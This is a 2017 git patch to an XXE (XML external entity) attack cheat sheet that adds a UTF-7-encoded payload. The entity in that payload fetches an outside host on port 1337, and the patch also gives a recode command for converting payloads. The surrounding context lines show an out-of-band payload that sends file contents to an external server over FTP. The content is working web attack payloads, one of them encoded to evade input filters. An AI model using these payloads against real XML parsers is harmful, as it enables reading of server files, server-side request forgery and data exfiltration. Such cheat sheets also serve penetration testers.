From 69ddac59b2f5b89ce7cee591fad36d4ba9f11dd4 Mon Sep 17 00:00:00 2001
From: sxcurity <sxcurity@gmail.com>
Date: Wed, 25 Oct 2017 10:33:24 -0500
Subject: [PATCH] Update xxe.md

Added a utf-7 payload :)
---
 cheatsheets/xxe.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md
index e0cefec..d2a86c9 100644
--- a/cheatsheets/xxe.md
+++ b/cheatsheets/xxe.md
@@ -75,3 +75,12 @@ File stored on http://publicServer.com/parameterEntity_sendftp.dtd
 <!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
 %param1;
 ```
+**XXE UTF-7**
+```
+<?xml version="1.0" encoding="UTF-7"?>
++ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
++ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
+```
+To convert between UTF-8 & UTF-7 use recode.
+`recode UTF8..UTF7 payload-file.xml`